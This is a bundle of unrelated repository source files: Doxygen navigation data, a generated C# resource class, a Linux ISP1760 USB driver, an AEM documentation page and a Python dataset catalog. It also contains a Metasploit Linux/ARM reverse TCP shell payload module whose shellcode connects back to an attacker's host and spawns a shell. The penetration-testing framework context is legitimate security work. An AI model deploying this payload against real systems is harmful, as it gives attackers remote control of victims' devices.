// Doxygen-generated navigation data for xdprxss.c: each entry maps an
// XDpRxSs driver API function name to its anchor in the generated HTML
// documentation.  Regenerated by Doxygen -- do not edit by hand.
var xdprxss_8c =
[
    [ "XDpRxSs_CfgInitialize", "group__dprxss__v4__1.html#ga25f3b6123ff5cbf277c4117617980738", null ],
    [ "XDpRxSs_CheckLinkStatus", "group__dprxss__v4__1.html#gad307346eadf7cca46055eb02f8e92ddb", null ],
    [ "XDpRxSs_ExposePort", "group__dprxss__v4__1.html#ga65886916bf0be3e73f4d718ec087c6f5", null ],
    [ "XDpRxSs_HandleDownReq", "group__dprxss__v4__1.html#gaae2cb38734654cfeca1d77b0439c243e", null ],
    [ "XDpRxSs_Reset", "group__dprxss__v4__1.html#gaf724dbd61d196f9bd1a8060f1f73816d", null ],
    [ "XDpRxSs_SetLaneCount", "group__dprxss__v4__1.html#ga180a0386c25a456d436bbfc9fec05c02", null ],
    [ "XDpRxSs_SetLinkRate", "group__dprxss__v4__1.html#gae447b427e7616d143f2170881fa79bb1", null ],
    [ "XDpRxSs_SetUserPixelWidth", "group__dprxss__v4__1.html#ga40a20785049e0c92a24c2612dd6a7098", null ],
    [ "XDpRxSs_Start", "group__dprxss__v4__1.html#ga5ada36b95407b1169e183bbb7b9847d6", null ]
];
|
JavaScript
|
BSD-3-Clause
|
AndreRenaud/embeddedsw/XilinxProcessorIPLib/drivers/dp12rxss/doc/html/api/xdprxss_8c.js
|
9f0333c4-20c5-4ca0-871c-5b63dea7cd9b
|
[]
|
[]
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.34011
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace SerialLabs.Data.AzureTable.Properties
{
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    // NOTE: generated file -- hand edits (including comments) are lost on
    // the next resource regeneration; change the .resx instead.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {

        private static global::System.Resources.ResourceManager resourceMan;

        private static global::System.Globalization.CultureInfo resourceCulture;

        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }

        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                // Lazily created on first access and cached for all lookups.
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SerialLabs.Data.AzureTable.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }

        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Unable to cast type '{0}' to target type '{1}'..
        /// </summary>
        internal static string ExpressionEvaluatorInvalidCast {
            get {
                return ResourceManager.GetString("ExpressionEvaluatorInvalidCast", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Type '{0}' is not supported..
        /// </summary>
        internal static string ExpressionEvaluatorTypeNotSupported {
            get {
                return ResourceManager.GetString("ExpressionEvaluatorTypeNotSupported", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Unable to get value of the node: '{0}'..
        /// </summary>
        internal static string ExpressionEvaluatorUnableToEvaluate {
            get {
                return ResourceManager.GetString("ExpressionEvaluatorUnableToEvaluate", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Unable to serialize type: '{0}'..
        /// </summary>
        internal static string SerializationExtensionsNotSupportedType {
            get {
                return ResourceManager.GetString("SerializationExtensionsNotSupportedType", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Member '{0}' does not supported..
        /// </summary>
        internal static string TranslatorMemberNotSupported {
            get {
                return ResourceManager.GetString("TranslatorMemberNotSupported", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Invalid method '{0}' arguments..
        /// </summary>
        internal static string TranslatorMethodInvalidArgument {
            get {
                return ResourceManager.GetString("TranslatorMethodInvalidArgument", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Method '{0}' does not supported..
        /// </summary>
        internal static string TranslatorMethodNotSupported {
            get {
                return ResourceManager.GetString("TranslatorMethodNotSupported", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Operator '{0}' does not supported..
        /// </summary>
        internal static string TranslatorOperatorNotSupported {
            get {
                return ResourceManager.GetString("TranslatorOperatorNotSupported", resourceCulture);
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Unable to evaluate an expression: '{0}'..
        /// </summary>
        internal static string TranslatorUnableToEvaluateExpression {
            get {
                return ResourceManager.GetString("TranslatorUnableToEvaluateExpression", resourceCulture);
            }
        }
    }
}
|
C#
|
MIT
|
serial-labs/SharedLibraries/Source/SerialLabs.Data.AzureTable/Properties/Resources.Designer.cs
|
f53e1bac-9b25-4bd1-b390-5cfaafd08186
|
[{"tag": "IP_ADDRESS", "value": "4.0.0.0", "start": 942, "end": 949, "context": "m.Resources.Tools.StronglyTypedResourceBuilder\", \"4.0.0.0\")]\n [global::System.Diagnostics.DebuggerNonUse"}]
|
[{"tag": "IP_ADDRESS", "value": "4.0.0.0", "start": 942, "end": 949, "context": "m.Resources.Tools.StronglyTypedResourceBuilder\", \"4.0.0.0\")]\n [global::System.Diagnostics.DebuggerNonUse"}]
|
/*
* Glue code for the ISP1760 driver and bus
* Currently there is support for
* - OpenFirmware
* - PCI
* - PDEV (generic platform device centralized driver model)
*
* (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>
*
*/
#include <linux/usb.h>
#include <linux/io.h>
#include <linux/module.h>
#include <linux/of.h>
#include <linux/platform_device.h>
#include <linux/slab.h>
#include <linux/usb/isp1760.h>
#include <linux/usb/hcd.h>
#include "isp1760-core.h"
#include "isp1760-regs.h"
#ifdef CONFIG_PCI
#include <linux/pci.h>
#endif
#ifdef CONFIG_PCI
/*
 * One-time PCI bring-up of the ISP1761 behind its PLX bridge:
 *  - sanity-check BAR3 (the chip's shared memory) and fix up a bad PCI
 *    latency timer if the device reports one,
 *  - poll the controller's scratch register until the bridge's local init
 *    completes and the chip echoes the test pattern back,
 *  - enable interrupt passing in the PLX bridge (INT CSR register in BAR0).
 * Returns 0 on success or a negative errno.  Both BARs are unmapped and
 * released again before returning; the real mapping is done later by the
 * core driver.
 */
static int isp1761_pci_init(struct pci_dev *dev)
{
	resource_size_t mem_start;
	resource_size_t mem_length;
	u8 __iomem *iobase;
	u8 latency, limit;
	int retry_count;
	u32 reg_data;

	/* Grab the PLX PCI shared memory of the ISP 1761 we need  */
	mem_start = pci_resource_start(dev, 3);
	mem_length = pci_resource_len(dev, 3);
	if (mem_length < 0xffff) {
		printk(KERN_ERR "memory length for this resource is wrong\n");
		return -ENOMEM;
	}

	if (!request_mem_region(mem_start, mem_length, "ISP-PCI")) {
		printk(KERN_ERR "host controller already in use\n");
		return -EBUSY;
	}

	/* map available memory */
	iobase = ioremap_nocache(mem_start, mem_length);
	if (!iobase) {
		printk(KERN_ERR "Error ioremap failed\n");
		release_mem_region(mem_start, mem_length);
		return -ENOMEM;
	}

	/* bad pci latencies can contribute to overruns */
	pci_read_config_byte(dev, PCI_LATENCY_TIMER, &latency);
	if (latency) {
		pci_read_config_byte(dev, PCI_MAX_LAT, &limit);
		if (limit && limit < latency)
			pci_write_config_byte(dev, PCI_LATENCY_TIMER, limit);
	}

	/* Try to check whether we can access Scratch Register of
	 * Host Controller or not. The initial PCI access is retried until
	 * local init for the PCI bridge is completed
	 */
	retry_count = 20;
	reg_data = 0;
	while ((reg_data != 0xFACE) && retry_count) {
		/*by default host is in 16bit mode, so
		 * io operations at this stage must be 16 bit
		 * */
		writel(0xface, iobase + HC_SCRATCH_REG);
		udelay(100);
		reg_data = readl(iobase + HC_SCRATCH_REG) & 0x0000ffff;
		retry_count--;
	}

	iounmap(iobase);
	release_mem_region(mem_start, mem_length);

	/* Host Controller presence is detected by writing to scratch register
	 * and reading back and checking the contents are same or not
	 */
	if (reg_data != 0xFACE) {
		dev_err(&dev->dev, "scratch register mismatch %x\n", reg_data);
		return -ENOMEM;
	}

	/* Grab the PLX PCI mem maped port start address we need  */
	mem_start = pci_resource_start(dev, 0);
	mem_length = pci_resource_len(dev, 0);
	if (!request_mem_region(mem_start, mem_length, "ISP1761 IO MEM")) {
		printk(KERN_ERR "request region #1\n");
		return -EBUSY;
	}

	iobase = ioremap_nocache(mem_start, mem_length);
	if (!iobase) {
		printk(KERN_ERR "ioremap #1\n");
		release_mem_region(mem_start, mem_length);
		return -ENOMEM;
	}

	/* configure PLX PCI chip to pass interrupts */
#define PLX_INT_CSR_REG 0x68
	reg_data = readl(iobase + PLX_INT_CSR_REG);
	reg_data |= 0x900;	/* local interrupt input + PCI interrupt enable */
	writel(reg_data, iobase + PLX_INT_CSR_REG);

	/* done with PLX IO access */
	iounmap(iobase);
	release_mem_region(mem_start, mem_length);

	return 0;
}
/*
 * PCI probe: validate IRQ, enable the device, run the PLX bridge bring-up,
 * then hand BAR3 and the IRQ over to the isp1760 core via isp1760_register().
 * On any failure after pci_enable_device() the device is disabled again.
 */
static int isp1761_pci_probe(struct pci_dev *dev,
		const struct pci_device_id *id)
{
	unsigned int devflags = 0;
	int ret;

	if (!dev->irq)
		return -ENODEV;

	if (pci_enable_device(dev) < 0)
		return -ENODEV;

	ret = isp1761_pci_init(dev);
	if (ret < 0)
		goto error;

	pci_set_master(dev);

	/* NOTE(review): clearing dma_mask disables DMA for this device --
	 * presumably forcing PIO transfers; confirm against the core driver
	 * before changing. */
	dev->dev.dma_mask = NULL;

	ret = isp1760_register(&dev->resource[3], dev->irq, 0, &dev->dev,
			       devflags);
	if (ret < 0)
		goto error;

	return 0;

error:
	pci_disable_device(dev);
	return ret;
}
/* PCI removal: unregister the core driver, then release the PCI device. */
static void isp1761_pci_remove(struct pci_dev *dev)
{
    isp1760_unregister(&dev->dev);
    pci_disable_device(dev);
}
static void isp1761_pci_shutdown(struct pci_dev *dev)
{
printk(KERN_ERR "ips1761_pci_shutdown\n");
}
/*
 * PCI match table.  NOTE(review): vendor is PLX with device 0x5406 and
 * subdevice 0x9054 — presumably a PLX bridge sitting in front of the
 * ISP1761; confirm against the board documentation.
 */
static const struct pci_device_id isp1760_plx[] = {
    {
        .class = PCI_CLASS_BRIDGE_OTHER << 8,
        .class_mask = ~0,
        .vendor = PCI_VENDOR_ID_PLX,
        .device = 0x5406,
        .subvendor = PCI_VENDOR_ID_PLX,
        .subdevice = 0x9054,
    },
    { } /* terminating entry */
};
MODULE_DEVICE_TABLE(pci, isp1760_plx);
/* PCI front-end operations for the PLX-bridged ISP1761. */
static struct pci_driver isp1761_pci_driver = {
    .name = "isp1760",
    .id_table = isp1760_plx,
    .probe = isp1761_pci_probe,
    .remove = isp1761_pci_remove,
    .shutdown = isp1761_pci_shutdown,
};
#endif
/*
 * Platform probe: collect chip configuration flags from the device tree
 * (or, failing that, from legacy platform data) and hand the memory and
 * IRQ resources to the isp1760 core driver.
 */
static int isp1760_plat_probe(struct platform_device *pdev)
{
    unsigned long irqflags;
    unsigned int devflags = 0;
    struct resource *mem_res;
    struct resource *irq_res;
    int ret;
    mem_res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
    irq_res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
    if (!irq_res) {
        pr_warn("isp1760: IRQ resource not available\n");
        return -ENODEV;
    }
    /* Preserve the trigger type specified by the resource provider. */
    irqflags = irq_res->flags & IRQF_TRIGGER_MASK;
    if (IS_ENABLED(CONFIG_OF) && pdev->dev.of_node) {
        /* Device-tree boot: translate DT properties into devflags. */
        struct device_node *dp = pdev->dev.of_node;
        u32 bus_width = 0;
        if (of_device_is_compatible(dp, "nxp,usb-isp1761"))
            devflags |= ISP1760_FLAG_ISP1761;
        /* Some systems wire up only 16 of the 32 data lines */
        of_property_read_u32(dp, "bus-width", &bus_width);
        if (bus_width == 16)
            devflags |= ISP1760_FLAG_BUS_WIDTH_16;
        if (of_property_read_bool(dp, "port1-otg"))
            devflags |= ISP1760_FLAG_OTG_EN;
        if (of_property_read_bool(dp, "analog-oc"))
            devflags |= ISP1760_FLAG_ANALOG_OC;
        if (of_property_read_bool(dp, "dack-polarity"))
            devflags |= ISP1760_FLAG_DACK_POL_HIGH;
        if (of_property_read_bool(dp, "dreq-polarity"))
            devflags |= ISP1760_FLAG_DREQ_POL_HIGH;
    } else if (dev_get_platdata(&pdev->dev)) {
        /* Legacy board-file boot: same flags, taken from platform data. */
        struct isp1760_platform_data *pdata =
            dev_get_platdata(&pdev->dev);
        if (pdata->is_isp1761)
            devflags |= ISP1760_FLAG_ISP1761;
        if (pdata->bus_width_16)
            devflags |= ISP1760_FLAG_BUS_WIDTH_16;
        if (pdata->port1_otg)
            devflags |= ISP1760_FLAG_OTG_EN;
        if (pdata->analog_oc)
            devflags |= ISP1760_FLAG_ANALOG_OC;
        if (pdata->dack_polarity_high)
            devflags |= ISP1760_FLAG_DACK_POL_HIGH;
        if (pdata->dreq_polarity_high)
            devflags |= ISP1760_FLAG_DREQ_POL_HIGH;
    }
    ret = isp1760_register(mem_res, irq_res->start, irqflags, &pdev->dev,
            devflags);
    if (ret < 0)
        return ret;
    pr_info("ISP1760 USB device initialised\n");
    return 0;
}
/* Platform removal: tear down the core driver instance for this device. */
static int isp1760_plat_remove(struct platform_device *pdev)
{
    isp1760_unregister(&pdev->dev);
    return 0;
}
#ifdef CONFIG_OF
/* Device-tree compatibles handled by the platform front-end. */
static const struct of_device_id isp1760_of_match[] = {
    { .compatible = "nxp,usb-isp1760", },
    { .compatible = "nxp,usb-isp1761", },
    { }, /* terminating entry */
};
MODULE_DEVICE_TABLE(of, isp1760_of_match);
#endif
/* Platform front-end operations. */
static struct platform_driver isp1760_plat_driver = {
    .probe = isp1760_plat_probe,
    .remove = isp1760_plat_remove,
    .driver = {
        .name = "isp1760",
        /* of_match_ptr() evaluates to NULL when CONFIG_OF is disabled. */
        .of_match_table = of_match_ptr(isp1760_of_match),
    },
};
/*
 * Module init: register both front-ends.  Loading succeeds if at least
 * one of the platform/PCI registrations succeeds; if both fail the slab
 * caches are torn down again and -ENODEV is returned.
 */
static int __init isp1760_init(void)
{
    int ret, any_ret = -ENODEV;
    isp1760_init_kmem_once();
    ret = platform_driver_register(&isp1760_plat_driver);
    if (!ret)
        any_ret = 0;
#ifdef CONFIG_PCI
    ret = pci_register_driver(&isp1761_pci_driver);
    if (!ret)
        any_ret = 0;
#endif
    /* Neither front-end registered: release the caches again. */
    if (any_ret)
        isp1760_deinit_kmem_cache();
    return any_ret;
}
module_init(isp1760_init);
/* Module exit: unregister both front-ends and free the slab caches. */
static void __exit isp1760_exit(void)
{
    platform_driver_unregister(&isp1760_plat_driver);
#ifdef CONFIG_PCI
    pci_unregister_driver(&isp1761_pci_driver);
#endif
    isp1760_deinit_kmem_cache();
}
module_exit(isp1760_exit);
|
C
|
BSD-2-Clause
|
yijunyu/demo-fast/datasets/linux-4.11-rc3/drivers/usb/isp1760/isp1760-if.c
|
12d4edcc-705d-4525-8801-24bfcbd4575e
|
[{"tag": "EMAIL", "value": "bigeasy@linutronix.de", "start": 203, "end": 224, "context": "d driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/usb.h>\n#include <linux/i"}, {"tag": "NAME", "value": "Sebastian Siewio", "start": 184, "end": 200, "context": "m device centralized driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/"}]
|
[{"tag": "EMAIL", "value": "bigeasy@linutronix.de", "start": 203, "end": 224, "context": "d driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/usb.h>\n#include <linux/i"}, {"tag": "NAME", "value": "Sebastian Siewio", "start": 184, "end": 200, "context": "m device centralized driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/"}]
|
---
title: Alter the Appearance
seo-title: Alter the Appearance
description: Modify the script
seo-description: Modify the script
uuid: 6930381b-74c1-4e63-9621-621dbedbc25e
contentOwner: User
products: SG_EXPERIENCEMANAGER/6.4/COMMUNITIES
topic-tags: developing
content-type: reference
discoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674
exl-id: 01a20578-56c3-41b3-8a0e-281104af2481
---
# Alter the Appearance {#alter-the-appearance}
## Modify the Script {#modify-the-script}
The comment.hbs script is responsible for creating the overall HTML for each comment.
To not display the avatar next to each posted comment:
1. Copy `comment.hbs` from `libs` to `apps`
1. Select `/libs/social/commons/components/hbs/comments/comment/comment.hbs`
1. Select **[!UICONTROL Copy]**
1. Select `/apps/social/commons/components/hbs/comments/comment`
1. Select **[!UICONTROL Paste]**
1. Open the overlaid `comment.hbs`
    * Double-click on node `comment.hbs` in the `/apps/social/commons/components/hbs/comments/comment` folder
1. Find the following lines and either delete or comment them out:
```xml
<aside class="scf-comment-author">
<img class="scf-comment-avatar {{#if topLevel}}withTopLevel{{/if}}" src="{{author.avatarUrl}}"></img>
```
Either delete the lines, or surround them with '<!--' and '-->' to comment them out. Also, the characters 'xxx' are being added as a visual indicator of where the avatar would have been.
```xml
<!-- do not display avatar with comment
<aside class="scf-comment-author">
<img class="scf-comment-avatar {{#if topLevel}}withTopLevel{{/if}}" src="{{author.avatarUrl}}"></img>
```
## Replicate the Overlay {#replicate-the-overlay}
Push the overlaid comments component to the publish instance using the Replication Tool.
>[!NOTE]
>
>A more robust form of replication would be to create a package in Package Manager and [activate](../../help/sites-administering/package-manager.md#replicating-packages) it. A package can be exported and archived.
From the global navigation, select **[!UICONTROL Tools > Deployment > Replication]** and then **[!UICONTROL Activate Tree]**.
For the Start Path enter `/apps/social/commons` and select **[!UICONTROL Activate]**.

## View Results {#view-results}
If you login to the publish instance as an administrator, e.g., http://localhost:4503/crx/de as admin/admin, you can verify the overlaid components are there.
If you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe that the posted comment no longer displays with an avatar, instead a simple 'xxx' is displayed.

|
Markdown
|
MIT
|
friendlymahi/experience-manager-64.en/help/communities/overlay-alter-appearance.md
|
b7856a13-0695-4481-879b-25caf7b22456
|
[{"tag": "EMAIL", "value": "discoiquuid", "start": 286, "end": 297, "context": "ES\ntopic-tags: developing\ncontent-type: reference\ndiscoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674\nexl-id: 01a"}, {"tag": "EMAIL", "value": "aaron.mcdonald@mailinator.com", "start": 2511, "end": 2540, "context": "onents are there.\n\nIf you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe "}]
|
[{"tag": "EMAIL", "value": "discoiquuid", "start": 286, "end": 297, "context": "ES\ntopic-tags: developing\ncontent-type: reference\ndiscoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674\nexl-id: 01a"}, {"tag": "EMAIL", "value": "aaron.mcdonald@mailinator.com", "start": 2511, "end": 2540, "context": "onents are there.\n\nIf you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe "}]
|
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
# Linux/ARM (little-endian) single-stage reverse TCP shell payload.
#
# The hand-written ARM shellcode below performs: socket(2,1,6) ->
# connect() to LHOST:LPORT -> dup2() of the socket onto
# stdin/stdout/stderr -> execve() of the configured SHELL
# (default /system/bin/sh) -> exit(0).
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => 'civ',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_ARMLE,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          # Byte offsets inside the packed shellcode that the framework
          # patches with the listener address (LHOST) and port (LPORT).
          'Offsets' =>
            {
              'LHOST' => [ 172, 'ADDR' ],
              'LPORT' => [ 170, 'n' ],
            },
          'Payload' =>
            [
              #### Tested successfully on:
              # Linux 2.6.29.6-cm42 armv6l
              # Linux 2.6.29.6-cyanogenmod armv6l
              # Linux version 2.6.25-00350-g40fff9a armv5l
              # Linux version 2.6.27-00110-g132305e armv5l
              # Linux version 2.6.29-00177-g24ee4d2 armv5l
              # Linux version 2.6.29-00255-g7ca5167 armv5l
              #
              # Probably requires process to have INTERNET permission
              # or root.
              ####

              # socket(2,1,6)
              0xe3a00002, # mov r0, #2 ; 0x2
              0xe3a01001, # mov r1, #1 ; 0x1
              0xe2812005, # add r2, r1, #5 ; 0x5
              0xe3a0708c, # mov r7, #140 ; 0x8c
              0xe287708d, # add r7, r7, #141 ; 0x8d
              0xef000000, # svc 0x00000000

              # connect(soc, socaddr, 0x10)
              0xe1a06000, # mov r6, r0
              0xe28f1084, # add r1, pc, #132 ; 0x84 (orig comment "1dr" was a typo)
              0xe3a02010, # mov r2, #16 ; 0x10
              0xe3a0708d, # mov r7, #141 ; 0x8d
              0xe287708e, # add r7, r7, #142 ; 0x8e
              0xef000000, # svc 0x00000000

              # dup2(soc,0) @stdin
              0xe1a00006, # mov r0, r6
              0xe3a01000, # mov r1, #0 ; 0x0
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000
              # dup2(soc,1) @stdout
              0xe1a00006, # mov r0, r6
              0xe3a01001, # mov r1, #1 ; 0x1
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000
              # dup2(soc,2) @stderr
              0xe1a00006, # mov r0, r6
              0xe3a01002, # mov r1, #2 ; 0x2
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000

              # execve("/system/bin/sh", args, env)
              # Shrink me here. I am lame.
              0xe28f0048, # add r0, pc, #72 ; 0x48
              0xe0244004, # eor r4, r4, r4
              0xe92d0010, # push {r4}
              0xe1a0200d, # mov r2, sp
              0xe92d0004, # push {r2}
              0xe1a0200d, # mov r2, sp
              0xe92d0010, # push {r4}
              0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0x8>
              0xe92d0002, # push {r1}
              0xe92d2000, # push {sp}
              0xe1a0100d, # mov r1, sp
              0xe92d0004, # push {r2}
              0xe1a0200d, # mov r2, sp
              0xe3a0700b, # mov r7, #11 ; 0xb
              0xef000000, # svc 0x00000000

              # exit(0)
              0xe3a00000, # mov r0, #0 ; 0x0
              0xe3a07001, # mov r7, #1 ; 0x1
              0xef000000, # svc 0x00000000

              # <af>: sockaddr_in template, patched via 'Offsets' above.
              # port offset = 170, ip offset = 172
              0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
              0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
              # <shell>: 16 zero bytes, overwritten by #generate (SHELL).
              0x00000000, # .word 0x00000000 ; the shell goes here!
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              # <arg>: 4 zero bytes, overwritten by #generate (SHELLARG).
              0x00000000  # .word 0x00000000 ; the args!
            ].pack("V*")
        }
      ))

    # Register command execution options
    register_options(
      [
        OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
        OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
      ], self.class)
  end

  # Build the final shellcode: splice the SHELL path (at most 15 chars,
  # leaving a trailing NUL) at offset 176 and the optional SHELLARG
  # (at most 3 chars) at offset 192.
  def generate
    p = super

    sh = datastore['SHELL']
    if sh.length >= 16
      raise ArgumentError, "The specified shell must be less than 16 bytes."
    end
    p[176, sh.length] = sh

    arg = datastore['SHELLARG']
    if arg
      if arg.length >= 4
        raise ArgumentError, "The specified shell argument must be less than 4 bytes."
      end
      p[192, arg.length] = arg
    end

    p
  end
end
|
Ruby
|
Apache-2.0
|
CCrashBandicot/metasploit-framework/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
|
d2f74f9d-e9b8-46bd-ad3a-3eb441f4d6d1
|
[{"tag": "IP_ADDRESS", "value": "192.168.1.1", "start": 4401, "end": 4412, "context": " 0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1\n # <shell>:\n 0x00000000"}]
|
[{"tag": "IP_ADDRESS", "value": "192.168.1.1", "start": 4401, "end": 4412, "context": " 0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1\n # <shell>:\n 0x00000000"}]
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""Centralized catalog of paths."""
import os
class DatasetCatalog(object):
    """Static catalog mapping symbolic dataset names to loader arguments.

    ``get(name)`` resolves a name such as ``"coco_2017_train"`` into a dict
    with the dataset ``factory`` class name and its constructor ``args``
    (paths joined onto ``DATA_DIR``).

    Fix: unknown names now always raise ``RuntimeError``.  Previously a
    name containing "coco" or "voc" that was missing from ``DATASETS``
    escaped with a bare ``KeyError`` instead of the intended error.
    """

    # Root directory all relative dataset paths are joined onto.
    DATA_DIR = "./datasets"
    DATASETS = {
        "coco_2017_train": {
            "img_dir": "coco/train2017",
            "ann_file": "coco/annotations/instances_train2017.json"
        },
        "coco_2017_val": {
            "img_dir": "coco/val2017",
            "ann_file": "coco/annotations/instances_val2017.json"
        },
        "coco_2017_test_dev": {
            "img_dir": "coco/test2017",
            "ann_file": "coco/annotations/image_info_test-dev2017.json"
        },
        "coco_2014_train": {
            "img_dir": "coco/train2014",
            "ann_file": "coco/annotations/instances_train2014.json"
        },
        "coco_2014_val": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/instances_val2014.json"
        },
        "coco_2014_minival": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/instances_minival2014.json"
        },
        "coco_2014_valminusminival": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/instances_valminusminival2014.json"
        },
        "keypoints_coco_2014_train": {
            "img_dir": "coco/train2014",
            "ann_file": "coco/annotations/person_keypoints_train2014.json",
        },
        "keypoints_coco_2014_val": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/person_keypoints_val2014.json"
        },
        "keypoints_coco_2014_minival": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/person_keypoints_minival2014.json",
        },
        "keypoints_coco_2014_valminusminival": {
            "img_dir": "coco/val2014",
            "ann_file": "coco/annotations/person_keypoints_valminusminival2014.json",
        },
        "voc_2007_train": {
            "data_dir": "voc/VOC2007",
            "split": "train"
        },
        "voc_2007_train_cocostyle": {
            "img_dir": "voc/VOC2007/JPEGImages",
            "ann_file": "voc/VOC2007/Annotations/pascal_train2007.json"
        },
        "voc_2007_val": {
            "data_dir": "voc/VOC2007",
            "split": "val"
        },
        "voc_2007_val_cocostyle": {
            "img_dir": "voc/VOC2007/JPEGImages",
            "ann_file": "voc/VOC2007/Annotations/pascal_val2007.json"
        },
        "voc_2007_test": {
            "data_dir": "voc/VOC2007",
            "split": "test"
        },
        "voc_2007_test_cocostyle": {
            "img_dir": "voc/VOC2007/JPEGImages",
            "ann_file": "voc/VOC2007/Annotations/pascal_test2007.json"
        },
        "voc_2012_train": {
            "data_dir": "voc/VOC2012",
            "split": "train"
        },
        "voc_2012_train_cocostyle": {
            "img_dir": "voc/VOC2012/JPEGImages",
            "ann_file": "voc/VOC2012/Annotations/pascal_train2012.json"
        },
        "voc_2012_val": {
            "data_dir": "voc/VOC2012",
            "split": "val"
        },
        "voc_2012_val_cocostyle": {
            "img_dir": "voc/VOC2012/JPEGImages",
            "ann_file": "voc/VOC2012/Annotations/pascal_val2012.json"
        },
        "voc_2012_test": {
            "data_dir": "voc/VOC2012",
            "split": "test"
            # PASCAL VOC2012 doesn't made the test annotations available, so there's no json annotation
        },
        "cityscapes_fine_instanceonly_seg_train_cocostyle": {
            "img_dir": "cityscapes/images",
            "ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_train.json"
        },
        "cityscapes_fine_instanceonly_seg_val_cocostyle": {
            "img_dir": "cityscapes/images",
            "ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_val.json"
        },
        "cityscapes_fine_instanceonly_seg_test_cocostyle": {
            "img_dir": "cityscapes/images",
            "ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_test.json"
        }
    }

    @staticmethod
    def get(name):
        """Return ``{"factory": ..., "args": ...}`` for the named dataset.

        COCO-style entries (name contains "coco", incl. the cityscapes
